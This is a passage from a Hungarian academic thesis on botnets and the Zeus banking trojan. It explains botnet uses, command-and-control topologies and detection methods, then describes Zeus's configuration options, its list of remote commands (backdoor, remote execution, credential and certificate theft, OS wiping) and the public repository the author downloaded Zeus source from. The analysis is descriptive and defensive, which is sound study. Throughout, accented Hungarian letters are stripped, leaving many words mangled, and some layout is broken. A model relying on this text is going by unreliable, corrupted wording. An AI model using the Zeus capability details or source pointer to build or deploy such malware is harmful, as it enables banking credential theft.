megtvesztik az ldozatot. Erre a szakdolgozatomban most kln nem fogok kitrni, mert ez olyan mrtk anyag, hogy akr egy jabb szakdolgozatot is lehetne rni belle. A botgazda megfertzi a lehet legtbb gpet, s ha megvan az a megfertztt mennyisg, ami elegend a gazda szmra akkor megkezdhetni a botok hasznlatt. gy kialakul egy bot hlzat vagy ms nven egy zombi hlzat, amelyet a botgazda a parancsnok irnytani tud. A vezrlshez klnleges mdszereket hasznlnak fel, hogy a gazda kilte titokba maradhasson, de a zombi hlzat ettl fggetlenl irnytottan mkdjn. Amikor a botgazda kiadja a parancsot a vezrl felletrl akkor a hlzatban lv botok vgrehajtjk a parancsot vagy parancsokat. Tbb klnbz tmadst is vgrehajtanak a botok, DoS vagy DDoS tmads (szolgltats megtagads), spam levlklds, inline hooking, adat lops, a kiadott parancsot a botok rvid idn bell vgrehajtjk. A botnet hlzat az egy dinamikus kzeg, amely folyamatosan vltozik, ha az ldozat gpt jrateleptik vagy valamilyen ms miatti hats eredmnyekppen a bot megsrl a gpen vagy trlsre kerl, akkor az a gp kiesik a hlzatbl. Onnantl kezdve a botgazda nem tudja irnytani, st mg ltni sem ltja az exgpet. Ugyanakkor az jonnan megfertztt gpek bekerlnek a bot hlzatba s vrjk a parancsot a bot gazdtl. [7] [28] [30] 7.2 A botnetek tevkenykedse

A botnetek alkalmazskre nagyon szleskr, ilyen lehet a spam levlklds, DoS DDoS tmadsszolgltats megtagads, jelszfejts, adatlops, web injektlssal, j botok beszervezse, adatgyjts. [28] Spam levlklds A botnetek legkedveltebb alkalmazsa a kretlen levelek kldse. Mr korbban a lehetsges krok ismertetse sorn lertam pr botnet tmadst, ahol szmszerstettem, hogy egy-egy spam levlklds hny felhasznlt rinthet. A megfertztt gpek segtsgvel kretlen reklmleveleket kldenek szt szerte a vilgban tbb milli ember szmra. A reklmlevelek tbb millis bevteli forrst jelentenek a reklmozott termk gyrtjnak, forgalmazjnak. A botnetek e miatt a szolgltatsnak a kzkedveltsge miatt lettek olyan elterjedtek s vltak annyira npszerv kiberbnzk krben. A bnzk relatv egyszeren s viszonylag kevs szablyt, trvnyt megszegve tudnak knnyen pnzhez jutni. A kretlen levelekben kzlt tjkoztatk tlnyom rsze rdektelen a cmzett/fogad szmra, gy ezzel is terhelik a fogad trhelyt, szellemi rfordtsnak idejt s valamennyi svszlessget. A botgazdk (a feladk) egy idpontban vagy rvid idn bell tbb millis nagysgrendben kpesek leveleket kldeni. Ez a botgazda rszrl 21

csekly mrtk befektetssel s rfordtott idvel jr, viszont cserbe risi haszonra tehet szert. Ezek a levelek valamilyen termket hirdetnek, amely olcs s ltalban silny minsg, vagy esetleg olyan termk, amely nylt csatornkon nem vagy korltozottan hirdethet, hasznlhat. Ajnlanak tovbb kihagyhatatlannak tn befektetsi lehetsgeket, amelyek nem egyszer a piramisjtkok kategrijba tartoznak, de lehet valamilyen szemlyes azonost megszerzse irnyul, esetenknt azt valamilyen abszurd indokkal altmaszt levl is. A spamek segtsgvel szmos bncselekmnyt is elkvetnek, ilyenek pldul az illeglis adatszerzsek, hitelkrtyacsalsok, szmtgpes rendszerekbe val illeglis behatolsok. De spam leveleknek az a fajtja, amellyel valamilyen termket hirdetnek, nem szmt kzvetlenl bncselekmnynek. Az emberek tbbsge tudja, hogy mi az a spam levl, azokat fel is ismerik, gy k nem is foglalkoznak vele, de a cmzettek kztt mindig akad nhny tized szzalknyi ember, akik nem tudja mi az a spam, st mg vsrolnak is. A botok nagyon nagy szmban kldik ki ezeket a spam leveleket, gy az akr egy tbb szzmillis pldnyban sztkldtt levl egytized szzalka is 10.000 vsrlt jelenthet. A botgazda szmra valamennyivel nagyobb bevtelt jelentenek azok a spamek, amelyek valamilyen trvnytelen hozzfrst, vagy adatlopst valstanak meg. [7] [28] [30] DoS vagy DDoS tmads A szmtstechnikban a Denial of Service vagy a Distributed Denial of Service tmadsok egy szolgltats megtagadsnak vagy a hlzati erforrsok elrsnek megtagadst jelentik a felhasznl szmra. Ilyenkor a botgazda kiadja a parancsot a botoknak, hogy egy bizonyos cmen tallhat eszkz irnyba folyamatosan csatlakozsi ksrleteket kezdemnyezzenek, s ezzel a mdszerrel elrik azt, hogy a kiszolgl gp nem fogja tudni egy bizonyos szm csatlakozsi krelem felett kezelni a krseket s a rendszer sszeomlik. A gyakorlatban ez gy nz ki, hogy a tmads sorn teltdik a clgpen a kls kommunikcikrseket kezel trol, s ez olyannyira lekorltozza a szervert. A kiszolgl vagy nem tud vlaszolni a jogos forgalomra, vagy a vlaszid lesz nagyon hossz. A kiszolgl ilyen mdon trtn folyamatos terhelse vgl a szerver tlterhelshez vezet. Ennek a mdszernek a cljai s indtkai klnbzek lehetnek. A tmads clja lehet az, hogy meghatrozatlan idre a kiszolglt megbntsk, hatalmas krt okozva gy a szolgltatnak. A kiberbnzk ltalban ezzel a tmadssal web szervereket s web helyeket cloznak meg. A tmads clja lehet az is, hogy a szolgltatt egy idre htrnyba szortsk egy msik szolgltatval szemben. Ilyen lehet pldul egy 22

web shopon keresztli rtkestssel foglalkoz cg. Pr rra vagy akr pr napra mkdskptelen tve egy web ruhzat tbb milli forintos krokat is tudnak okozni vllalatoknak, akik mg a htrnyba is kerlnek a vetlytrsaikkal szemben. A 3. brn bemutatok egy DoS vagy DDoS tmads topolgijt, elmlett.[6] [7] [28] [30]

3. bra DoS, DDoS tmads

Jelszfejts A botok ereje abban rejlik, hogy nagyon sok gp van megfertzve s nagy botnet hlzatok jnnek ltre, ezt kihasznlva a botgazdk a botokat szoktk hasznlni jelszfejtsre, jelsztrsre (bruteforce jelsztrs). Ez azt jelenti, hogy a gpek nyers erejt hasznlva, minden kombincit kiprblva a titkost rendszerekkel szemben alkalmazott tmadsi mdszer. Ez a mdszer elmletileg mindig eredmnyes mivel minden lehetsges kombincit kiprbl gy benne lesz a helyes jelsz is, ennek a htrnya az, hogy lass a folyamat, mert nagyon sok kombincit kell kiprblni. Ezt a mdszert lehet felgyorstani azzal, hogy a feladatokat sztosztva tbb gp prblkozik a jelszval, gy ez a folyamat lnyegesen felgyorsthat. Mivel egy botnet hlzat elg nagy mreteket lt tbb milli gp is lehet gy a jelszprblkozsok prhuzamostva zajlanak, ami a jelsz megfejtsnek idejt nagyon lecsketi. [7] [28] [30] 23

Pldaknt szmtsuk ki egy 8 karakter hosszsg jelsz feltrshez szksges erforrst. Lehetsges jelsz vltozatok szma a kvetkez kplettel adhat meg: N=CL ahol, N a lehetsges kulcsok szma, C a karakterek szma s L a kulcs hossza. A magyar ABC betinek szma 44. Ha egy kzepesen ers jelszt szeretnnk hasznlni, akkor hasznlnunk javasolt kisbett, nagybett s szmot is. Mindsszesen ez 44 kisbett, 44 nagybett s 10 karakternyi szmot jelent, ami sszesen 98 karakter. A kplet alapjn kiszmolva 988=8,507630226*1015 kombincit jelent. Egy 4 magos, kzpkategris szmtgp a tesztek alapjn krlbell 3100 jelsz/msodperc sebessgre kpes. Ezzel a teljestmnnyel szmolva egy v alatt megkzeltleg 9,77616*1010 jelszt kpes ellltani. Teht ha egy 8 karakteres jelszt szeretnnk brute force mdszerrel feltrni, akkor 8,507630226*1015 / 9,77616*1010 = 87024,2531 v kellene az sszes jelsz kiprblshoz 1 szmtgpnek. Ha mindezt egy 100.000 gpet sszefog botnet hlzattal tesszk (ami a mai vilgban arnylag knnyen elrhet), akkor ez 0,870242531 vre, azaz 317,6385297 napra cskken. Termszetesen figyelembe kell venni, hogy a szmts az sszes lehetsges vltozatot mutatja. A gyakorlatban ennek a tredke is elegend, gy tovbb cskken a rfordtand id mennyisge. Adatlops, trvnytelen tartalomtrols Ez a botnet hlzatok egy jabb funkcija, amelyre 2011 v vgn, 2012 elejn derlt fny. A megfertztt gpeken a botgazda gy tud tetszleges tartalm, mennyisg adatot trolni, hogy arrl a fizikai gp tulajdonosa, hasznlja nem tud. Az adatokat az tlagos, otthoni felhasznl nem ltja, sokszor mg a host opercis rendszer szmra is lthatatlan. [7] [28] [30] Adatgyjts A vilgon tbb milli szmtgp fertztt valamilyen botnet klienssel, melyekrl a botgazda knnyszerrel megszerezheti a szmtgpeken lv szenzitv adatokat (neveket, jelszavakat, PIN, PUN kdokat, e-mail cmeket, telefonszmokat, bankkrtya szmokat, stb.). Ezen adatokat a botgazda vagy sajt maga hasznra hasznlja fel, vagy eladja, ms bnzk szmra. [7] [28] [30]

24

Web injektls, inline hooking Ezt a tmadsi mdot (MiB=Man in the browser) elszr 2005-ben mutatta be Augusto Peas de Barros.[39] Az ily mdon fertztt szmtgpekrl lehetsg van a titkostott weboldalakon (SSL/PKI) megadott adatok megszerzsre is. A ZEUS internet banking oldalakat tmadott Internet Explorer s Mozilla Firefox bngszk esetn. Az oldalak tartalmt rszben, vagy teljes egszben megvltoztatva jutott tbblet informcikhoz. 2009-ben az antivirus szoftverek mindssze 23%-a ismerte fel a fertzst, de ez az arny 2011-re sem vltozott jelentsen. [7] [28] [30] j botok beszervezse A botnet hlzatok annl ersebbek, hatkonyabbak, minl tbb tagjuk van. Ehhez folyamatosan jabb s jabb szmtgpek megfertzsre van szksg. Ezen cl kivitelezshez felhasznlhat a mr bot kliensknt mkd szmtgp is, gyorstva ezzel a krtkony kd minl szlesebb krben val elterjedst. Amint egy j szmtgp kerl a bot hlzatba, az azonnal megksreli felvenni a kapcsolatot a botgazdval s vrja az utastsokat. [7] [28] [30]

7.3 Mkdse
A botnetek letciklusa vltoz, de egyszer egy ponton biztosan elr odig, hogy jelezze a botgazda fel mkdkpessgt, azaz, hogy a hlzat j klienssel bvlt. Ezt a folyamatot nevezzk gylekezsnek. A kapcsolatfelvtel ltalban egy IRC szerveren keresztl trtnik, oly mdon, hogy a krtkony kd tartalmazza a vezrl s kliensek kztti kommunikcira hasznlt IRC szerver s azon ltrehozott csatorna elrhetsgt, melyre a kliens csatlakozik. Az IRC alapmkdsbl ereden ez egy igen elszigetelt kommunikcis terlet, gy ezt hasznlva a vezrl parancsokat tud kiadni a kliensek rszre. [7] [28] [30]

25

4. bra Bot net mkdse

1. Elszr a tmad csatlakozik az IRC szerverhez s kiadja a parancsot. 2. A parancs eljut IRC keresztl a csatornra felcsatlakozott zombi gpekhez. 3. A parancsot rtelmezik a zombi gpek s vgrehajtjk, sszehangolt tmadst indtanak. A botnetek bels biztonsgi rendszere lehetsget nyjt arra, hogy a botgazda az irnytshoz jelsz alap azonostst vagy rejtjelezett kommunikcit hasznljon. A botok kpesek j config file-t letlteni s ezt alkalmazni, amelyben lehetnek j frisstsek sebezhetsgi informcik, j irnyt kzpontok cmei, vagy j funkcik, kiegszt exploitok. A botgazda azt is figyelheti, hogy a zombi gpen van-e esetleg ms krtkony kd is. Esetleges tallatkor lehetsge van ellenintzkedseket tenni, amely sorn a msik krtkony kdot deaktivlhatja, vagy eltvolthatja a szmtgprl. A botgazda hasonlkppen jrhat el akkor is, ha a kliens mkdst htrnyosan befolysol alkalmazst tall. [7] [28] [30]

7.4 Elterjeds
A botnetek elterjedse mra vilgmretv ntte ki magt. A zombi hlzatok szma igen dinamikusan vltozik. A C&C szerverek s a fertztt szmtgpek pillanatnyi llapott folyamatosan kvethetjk napjaink piacvezet felhalap biztonsgi cgnek a weboldaln. (http://www.trendmicro.com/us/security-intelligence/current-threat-activity/ 26

global-botnetA

map/index.html).

Ugyanitt oldalon,

lthatjuk,

hogy

2013-ban a

(ezidig) ltal

megkzeltleg 3.200.000 fertztt szmtgp s tbb mint 1.200 C&C szerver volt. https://zeustracker.abuse.ch nyomon kvethetjk Spamhaus nyilvntartott Zeus aktivitsokat akr 60 napra visszamenlegesen is.

5. bra Zeus tracker statisztika

7.5 Botnet elnye s htrnya


A botnet kliensek a trjai vrusok kategrijba tartoznak, amelynek f cljuk, hogy egy kiskaput nyissanak a botgazda fel, hogy tvoli asztali gpvezrlst adjon a botgazdnak. Ezeknek a tvvezrlseknek az a htrnya, hogy ltalban a kapcsolat nincs kdolva, nincs hitelests, gy msok is tvehetik a vezrlst s irnythatjk a gpet. A botnetek elnye s htrnya egy s ugyanazon dologban rejlik: a kiterjedtsgkben. Minl elosztottabb egy hlzat, annl inkbb cskken a

27

hatkonysga, ugyanakkor annl nehezebb a detektlsa. A botgazdknak ppen ezrt kompromisszumot kell ktnik a hasznlhatsg s a detektls tern.

7.6 Fajti, tpusai


Hlzati topolgia szerint a botnetek kt csoportra oszthatk: Peer to Peer (P2P) botnetek: Ebben az esetben nincs kzponti vezrl egysg, nincs vezrl panel, a botok egymssal kommuniklnak. A botgazda a parancsot egy vagy kt vezrl botnak adja csak ki, majd ezek a botok adjk tovbb a parancsot a tbbi bot fel, gy a botok, ahogy megkaptk a parancsot rvid idn bell vgrehajtjk a tmadst. Ezt a technikt alkalmazva a botgazda, aki a tmadst koordinlja s a vezrl szemly azonostsa sokkal nehezebb, gy vdettebb helyzetben lehet. A P2P botnet ltal hasznlt topolgit szemlltetem a 6-os brval. [7] [13] [16]

6. bra Peer to peer kapcsolat

Kzpontostott (centralizlt) botnetek: A botgazda egy kzponti vezrln adja ki a parancsot a botoknak, a zombi hlzatban lv sszes bot ezzel a vezrlegysggel kommunikl. Ennek a hlzati topolgija a csillag, ahol a vezrl egysg, a botgazda van kzpen. Ennek elnye az, hogy a botok koordinlsi feltteleinek megteremtse relatv egyszer, mert 28

minden bot ugyanazzal a vezrlvel kommunikl. Htrnya, hogy gy a botgazda szemlye is knnyebben felderthet. Az interneten lv botok tbbsge mg ezt a fajta technikt hasznlja. A kzpontostott botnet ltal hasznlt topolgit szemlltetem a 7-es brval.

7. bra Centralizlt botnetek

A klnbz topolgij botnetek tulajdonsgai: [28] [30] Tervezs Botner detektls Centralizlt P2P Knny Nehz Knny Nehz Kicsi Kzepes Rossz Kivl Ksleltets Tlls Vezrl detektls Knny Nehz

1 Tblzat: Botnet tpusok tulajdonsgai

29

7.7 Bot detektls s eltvoltsa


Egy szmtgp fertzttsge ktflekppen is szlelhet: Felhasznli szinten: amikor a megfertztt gpet valamilyen vrusirt vagy behatols felismer rendszer (IDS - Intrusion Detection System) segtsgvel megprbljuk megtallni. Ez a mr ismert botnet vltozatok ellen hatkony csupn, az jabb, nem ismert vltozatok ellen nem. [28] [30] Hlzat szintjn: ekkor a teljes hlzatot figyelve, a forgalmat vizsglva megprbljuk a botnetek forgalmt s tevkenysgt szlelni. Ez a mdszer hatkony rgi s j botnet vltozatok esetn is. Htrnya, hogy nagy szakrtelmet, hozzrtst s idt ignyel. [28] [30]

7.7.1 Felhasznli szinten


Detektls egyni, otthoni felhasznl szinten Ekkor a vgfelhasznlnl az ldozatul esett szmtgpre teleptett vrusirt szoftver segtsgvel megprbljuk szlelni a botnetet. Ez a megolds csak akkor lehet sikeres, ha minden felhasznl rendszeresen hasznl valamilyen jogtiszta s naprakszen frisstett vrusirt szoftvert, hogy a mr ismert botnetek terjeszkedse ellen megfelel vdelmet nyjtson. Sajnos ez manapsg nem a leghatkonyabb mdszer, mert a szmtgp hasznlk tbbsge egyltaln nem hasznl, vagy nem jogtiszta, esetleg nem frisstett vrusirtt hasznl. gy ezzel a mdszerrel csak kismrtkben lehet cskkenteni a zombi hlzatok mrett. [28] [30] Detektls vllalati szinten A vllalatok tbbsge rendszeresen hasznl valamilyen vrusirt szoftvert s egyb behatols felismer rendszert (IDS). Szinte mindegyik vllalat rendelkezik kzpontostott menedzsmenttel, ami jelentsi s naplzsi funkcival van elltva. Vllalati krnyezetben, helyi fertzs esetn, tbb gpen is sikeres lehet a veszlyforrs azonostsa, ezekkel az eszkzkkel, mieltt nagyobb krokat okozna a sajt, illetve msok hlzatban. A 8. brn lthatunk ilyen szerkezet rendszert. [28] [30]

30

8. bra Detektls vllalati szinten

A vrusirtk alapveten kt mdszert alkalmazva prbljk felismerni a krtkony programokat. lenyomat alapjn, mskppen nevezve szekvencia vagy szignatra alapjn heurisztikus eljrs alapjn Lenyomat, szekvencia, szignatra alapjn A krtkony kdot felhasznlva egy lenyomatot ksztenek, s a vruskeres programok ezt a mintt keresik a file-okban. A klnbz vrusirt programok ms s ms szekvencit hasznlnak s klnbz algoritmusok alapjn dolgoznak, ezrt tapasztalhat olykor jelents klnbsg a vrusirt szoftverek hatkonysga tern. A mdszer elnye a gyorsasg, htrnya, hogy csupn a mr ismert, korbban mr szlelt krtkony kdok ellen nyjt vdelmet. [28] [30] Heurisztikus eljrs alapjn Ez a mdszer mg akkor prblja meg szlelni a krtkony kdokat, amikor azok mg nem ismeretek, algoritmus, lenyomat mg nem kszlt hozz. Az alkalmazs nem a lenyomatokat vizsglja a file-okban, hanem kdokra s esemnyekre alkalmazott szablyok pontozsa alapjn szmt ki egy rtket, majd ez alapjn eldnti, hogy a file tartalmaz-e krtkony kdot vagy nem. Ezrt a heurisztikus eljrsok elnye, hogy olyan 31

krtkony kdokat is felismerhet, amelyek mg a vrusirtk adatbzisban mg nem szerepel, amelyekre szignatra mg nem kszlt. Htrnya, a korltozott megbzhatsg (sok false pozitv tallat), valamint az arnylag alacsony feldolgozsi sebessg. A felhasznlszint vdekezs hasznos a botok felismersben s segthet a zombi hlzatok visszaszortsban, azonban ez nem nyjt elegend vdelmet a bothlzatok ellen, mert a botgazdk a vdelmi szoftverek eltt jrva egy lpssel olyan mdszereket alkalmaznak, amelyekre a vdelmi szoftverek, eszkzk mg nem kszltek fel. [28] [30]

7.7.2 Hlzati szinten


A hlzat szint szlels esetben az egsz hlzatot vizsgljuk, gymond monitorozzuk, figyeljk a forgalmt s ezt elemezve llapthatjuk meg, hogy a hlzatunk fertztt-e vagy nem. Ennek a mdszernek a nagy elnye az, hogy felhasznltl s botok kdjtl, vltozattl teljesen fggetlen, gy forgalmi mintval ismert botok is kiszrhetek. A forgalombl megfelel ismeretekkel kvetkeztetseket lehet tenni a tmad kiltre. A hlzat szint mdszer tbb rszre oszthat, leggyakrabban hasznlt eljrsok a csapdagpek s csapdahlzatok (honeypotok s honeynetek) s a behatols detektl rendszerek (IDS). [8] [28] [30] IDS Behatols detektci (Intrusion Detection System) A behatols detektln olyan eljrsok gyjtemnye, amely automatikusan kpes jelezni a gyans tevkenysgeket a hlzatban s a szmtgpben. Az IDS hlzati szinten a csomagokat vizsglja, de mkdhet lenyomatok, szignatrk alapjn, illetve hasznlhat heurisztikus mdszereket is. [28] [30] Honeypotok s honeynetek Ezek olyan eszkzk, amelyek teljesen tlagos szmtgpnek, hlzatnak lczzk magukat a klvilg szmra, de valjban csapdaknt mkdnek. Ilyen csapdkat helyeznek el a rendszergazdk a hlzatuk krnyezetben. Ha a rosszindulat kd megfertzi ezt az eszkzt, akkor ennek analizlsval, elemzsvel hibkat lehet keresni, lenyomatokat lehet kszteni, viselkeds-mdot lehet feljegyezni. Ezeket a csapdagpeket kategorizlni szoktk interakcis szintjk szerint, ltalban hrom kategrit lltanak fel alacsony, kzepes s magas interakcij. [8] [28] [30] Alacsony Ezen a szinten a csapda szinte semmit nem enged meg a rosszindulat kdnak (bot kliens). Elfogadja a tmadst jelent adatokat, de tovbbi lehetsgeket nem enged meg. Ez a fajta interakci arra szolgl, hogy a tmadrl adatokat gyjtsenek. [28] [30] 32

Kzepes Ez a fajta interakci a kt szint kztt helyezkedik el. Megengedi a tmadnak, hogy a rosszindulat kdot (bot klienst) eljutassa a csapdagpre, de a mkdtetst s futtatst csak emullja, gy a tmad adatait anlkl tudjuk meg, hogy a bot kliens valjban mkdne. [28] [30] Magas Elfogadja a tmadst jelent adatcsomagokat s tovbbi lehetsgeket is engedlyez, gy a tmad futtatni s mkdtetni tudja a rosszindulat kdot. Ezen a szinten mr nem csak adatgyjts a cl, hanem pontos kpet alkotni egy-egy bot kliens mkdsrl, vezrlsrl vagy akr a titkosts folyamatrl. [28] [30] Naplfjlok s hlzati forgalom analzise Megfelel szint informatikai ismeretek birtokban, elegend lehet a switchek s a routerek naplfjljainak vizsglata is, a hlzat fertzttsgnek felismershez. A mai modern hlzati eszkzk naplfjljaiban nem csupn a hlzati forgalom adatai szerepelnek, hanem a tmadsok, tmadsi ksrletekrl szl riasztsok is. [28] [30] Egyb megoldsok A fent emltett mdszereken kvl mg van nhny ksrleti fzisban lv technika, amit alkalmazni szoktak zombi hlzatok feldertsre: Az IRC szervereken mkd parancs csatornk figyelse. Ezzel a mdszerrel csak azokat a bot klienseket lehet kiszrni, amelyek ezt a technikt hasznljk. Az IRC forgalmt nem csak a csatornn foly beszlgetssel lehet vizsglni, hanem a kliensekhez kzel, a hlzati kommunikci vizsglatval is. Statisztikai mdszerek segtsgvel megklnbzethet a vals szemlyek (emberek) s a botok kommunikcija. Ennl a mdszernl viszonylag egyszer a feladat, mert egy kzponti egysghez (vezrl panelhez) csatlakozik az sszes bot kliens. A msik technika a P2P botok szlelsre lehet megolds, kihasznlva azt, hogy a botok egymssal kommuniklnak, ezrt egy port-nak mindig nyitva kell lenni a bot kliens szmra, amin keresztl adatokat tud fogadni ms klienstl. Termszetesen egy port nem kthet teljes bizonyossggal egy bot klienshez, ezrt a sikertelen kapcsoldsok figyelsvel kiszrhet, mert a P2P botok cmlistjban szerepl hibs cmek miatt gyakran sikertelen a kapcsolds. Ezen kvl, ha tbb host is prbl ugyanarra a fix IP cmre csatlakozni, akkor az is gyans viselkedsre utalhat. [28] [30]

33

8 Zeus
8.1 Zeus ismertetse
A Zeus egy trjai vrus, egy botnet, amelyet ms nven Zbot-nak is szoktak nevezni a vilghln. Ez egy olyan kros kdot tartalmaz (malware) csomag, amelynek a forrskdja knnyen beszerezhet az interneten, vagy akr a mr ksz botnet hlzatokat, zombi hlzatok is brelhetek. (ld. 6. fejezet Mennyibe kerl egy botnet?). Mint ahogy a botok tbbsge, a Zeus is a (MiB=Man in the Browser) fajta tmadsi stlust rszesti elnyben s hasznlja. [24] [25] [26] Zeus szletse A Zeus krtkony kdot elszr 2007-ben azonostottk, de szleskr elterjedse csak 2009-ben kvetkezett be. Ekkorra mr a Prevx biztonsgi cg jelentse szerint tbb mint 74.000 FTP felhasznli fikot fertztt meg olyan cgeknl (a teljessg ignye nlkl), mint a Bank of America, NASA, Oracle. A Zeust valsznleg egy orosz szrmazs fejleszt vagy fejleszt csapat tallta ki s ksztette el, de erre csupn a kdban tallhat orosz nyelv megjegyzsek utalnak. [40] Azrt lett olyan npszer ez a krtkony kd a kiberbnzk krben, mert gy hirdettk magukat, mint egy sikeres eszkz, amely segtsgvel online hitelest adatokat lehet megszerezni. A Zeus-t eleinte adathalszatra hasznltk, ksbb a zombi hlzat tovbbi elnyeit is elkezdtk kiaknzni, hogy minl nagyobb haszonra tegyenek szert a kiberbnzk. Ilyen lehetsgek voltak a DoS s a DDoS (szolgltats megtagads) tmadsok, spam levlklds. 2011-ben nyilvnossgra hoztk a Zeus forrs kdjt, aminek eredmnyeknt tbb szz Zeus vltozat jelent meg az interneten. [24] [25] [26] Clzott opercis rendszerek Eredetileg a Zeus csak Microsoft Windows opercis rendszereken mkdtt egszen 2012-ig, amikor a Kaspersky Lab kutati rbukkantak a Zitmo (Zeus in the mobil) krtkony kdra, ami egy Zeus vltozat. Ezzel a trjai vrussal megfertzhetek Symbian, Windows Mobil, Blackberry, Android opercis rendszerrel mkd okos telefonok is. A vizsglatokat kizrlag Microsoft Windows opercis rendszeren mkd vltozatval vgeztem. [14]

34

8.2 Zeus cljai s funkcionalitsa


A f clja a Zeus-nak, hogy interneten keresztl a meghatrozott parancsokat, amelyeket a botgazdtl kap, vgrehajtson. A botgazda a Zeus-t hasznlva olyan informcikhoz jusson vagy olyan feladatokat lsson el, amelyet a botgazda megrendelsre teljest vagy ksbbi rtkests sorn ad el. A sajt haszon nvelse rdekben cselekszik a botgazda. [24] [25] [26] A Zeus-nak 4 f kpessge van: sszegyjti a rendszer informcikat, Ellopja a vdett s eltrolt adatokat (pl.: FTP, POP3 jelszavak), Ellopja az online szemlyes adatokat, jelszavakat, specilis konfigurcis fjlokat, Csatlakozik a parancs s vezrl (command s control) szerverhez, majd tovbbi feladatokat hajt vgre. Rendszer informcik sszegyjtse Alaprtelmezetten a Zeus automatikusan sszegyjti a klnbz rendszerek adatait s tovbbtja azt a parancs s vezrl (C&C) szerver fel. Az sszegyjttt informcikat adatbzisban trolja, melyet felhasznlva a botgazda specilis feladatokat kpes alkotni, illetve kategorizlni, csoportostani is tudja a fertztt szmtgpeket. [24] [25] [26] Ezek az informcik a kvetkez adatokat tartalmazzk: A bot egyedi azonostjt Bot nevt Bot verziszmt Opercis rendszer verzijt Opercis rendszer nyelvt A megfertztt gp helyi idejt A bot llapott (zemel-e) Utols jelents idejt A fertztt gp honos orszgt Fertztt gp IP-cmt Fertztt gp fut folyamatait A vdett s eltrolta adatok sszegyjtse Ktfle mdszerrel hajtja vgre:

35

A bot ltrehozsnl a botgazda beleintegrlja a bot binris kdjba azokat az intzkedseket s cselekvseket, amiket a bot automatikusan vgre kell hajtson. A bot felveszi a kapcsolatot a C&C szerverrel s onnan letlti a bot config fjlt, ami tartalmazza azokat az intzkedseket, parancsokat, amelyeket automatikusan kell vgrehajtania. Miutn a bot aktivlsra kerlt, vgrehajtja azokat a feladatokat, amelyeket parancsba kapott s elvgzi az automatikus feladatokat is. Automatikusan ellopja a PSTORE, Protected Storage-okat, amelyek ltalban tartalmazzk az Internet Explorer mentett jelszavait, knyvjelzit, s automatikusan rgzti az FTP s POP3 levelezs jelszavait. A konfigurcis fjl magba foglalja a klnbz parancsokat, amelyek lehetnek: url_loader: Frissts helye, cme a bot szmra url_server: parancs s vezrl (command and control) szerver helye, cme AdvancedConfigs: Alternatv URL cm, ahol a bot megtallja a konfigurcis fjlt Webfilters: Egy szabvnyostott URL listt tartalmaz, amelyet a botgazda figyelemmel tud ksrni. Minden adatot elkld a bot az URL-rl, amelyek olyan adatokat tartalmazhatnak, mint pldul: online banki meghatalmazsok, visszaigazol jelentsek vagy msodlagos azonostsra szolgl kdok. Az adatok rgztse mg az SSL titkosts eltt megtrtnik, gy hiba kommunikl a felhasznl a bankkal titkostott csatornn, ettl fggetlenl sikerl a botnak minden szemlyes informcit megszereznie. Tovbb, lehetsget biztost a botgazda rszre kpernykp mentsre (screenshot-ra) is. WebDataFilters: Ez egy olyan web adat szr szabvny lista az URL-ekrl, amely tartalmazza azokat a szveg sablonokat s mintkat, amelyek az adott weboldalon a botgazda szmra relevns tartalommal brhatnak. (pl.: password, login). WebFakes: A bot a megadott URL-t tirnytja a sajt URL-re, ami ltalban az eredeti oldal mdostott msolata. TANGrabber: A tranzakci hitelestsi szm, TAN (Transaction Authentication Number) az online banki tranzakcik hitelestsre szolgl. Kznyelven ezt ktfaktoros hitelestsnek nevezik. Ez egy egyszer hasznlatos kd, amely segtsgvel tranzakcit lehet vgrehajtani. A TAN nlkl nem lehet semmilyen tranzakcit vgrehajtani, ezrt a bot kpessgei kz tartozik ennek a biztonsgi kdnak az ellopsa is, amelyet ha a bot megszerez, elkldi a C&C szervernek.

36

DNSMap: Egyedileg hozzadott Host fjl, amely arra szolgl, hogy a gyakran hasznlt biztonsgi oldalakat (pl.: antivrus gyrtok oldalai) a felhasznl szmra elrhetetlenn tegye. A botgazdk ltalban a felhasznlt egy hamis oldalra irnytjk t. file_webinjects: Ez a web oldal befecskendezsi (Web Page Injection) technika: megvltoztatja az online bankozsra alkalmas weboldal szerkezett. A felhasznltl a ksbbi tmadshoz szksges, de a bank ltal soha nem ignyelt azonostkat kr be a weboldalon (pl.: PIN kd). A weboldal ettl fggetlenl tkletesen mkdik, teljes mrtkben elltja azokat a funkcikat, amire az eredeti oldal is hivatott. A 9. brn lthat az eredeti s egy mdostott weboldal.

9. bra Hamis web oldal injekcit

Funkcijt tekintve a kt weboldal azonos, egyetlen klnbsg a mdostott oldalon megjelen PIN mez. [24] Tovbbi feladatok A bot aktv llapotban kpes egyb feladatokat is elltni. A kdba gyazott parancsokat a botgazda a C&C szerveren keresztl aktivlja. [24] [25] [26] Elrhet parancsok a Zeus-ban: Reboot: szmtgp jraindtsa Kos: trli a rendszer fjlokat, ezzel tnkreteszi az opercis rendszert Shutdown: Szmtgp lelltsa Bc_add: hts ajt (backdoor) nyitst teszi lehetv a szerver fel, gy teszi lehetv korltlan parancsok vgrehajtst Bc_del: trli a backdoor kapcsolatot Block_url: blokkolja a hozzfrst bizonyos URL cmhez Unblock_url: visszalltja a hozzfrst a blokkolt URL cmhez 37

Block_fake: a hamis HTML oldal hasznlatnak tiltsa, amely megfelel a meghatrozott oldalnak, URL-nek Unblock_url: a hamis HTML oldal hasznlatnak engedlyezse, amely megfelel a meghatrozott oldalnak, URL-nek Rexec: tltse le a szerverrl a fjlt s futtassa Lexec: futtat egy helyi fjlt Lexeci: futtat egy helyi fjlt, amit a felhasznl hasznl Addsf: hozzad egy fjl maszkot, a helyi keresshez Delsf: eltvoltja a fjl maszkot, a helyi keressbl Getfile: feltlt egy fjlt vagy mappt Getcerts: ellop valamilyen digitlis tanstvnyt Resetgrab: ellop valamilyen informcit a PSTORE (Protected storage)-bl vagy valamilyen cook-it Upcfg: frissti a konfigurcis fjlt Rename_bot: tnevezi a bot-ot Getmff: feltlti a flash cookie-kat Delmff: trli a flash cookie-kat Sethomepage: megvltoztatja az Internet Explorer kezdlapjt

8.3 Kros kdot tartalmaz csomag (malware package)


A Zeus krtkony kd csomagot a https://github.com/Visgean/Zeus oldalrl tltttem le. Ez a 2011-ben nyilvnossgra hozott verzi, a 2.0.8.9-es verzi szm Zeus vltozat. Ez a csomag egy alap Zeus-t tartalmaz, amelyben megtallhatak a szerver oldalhoz szksges fjlok s a kliens oldalhoz szksges fjlok is, ezen kvl mg tartalmazza az alkalmazsok forrskdjait is.

8.4 Zeus elterjedse


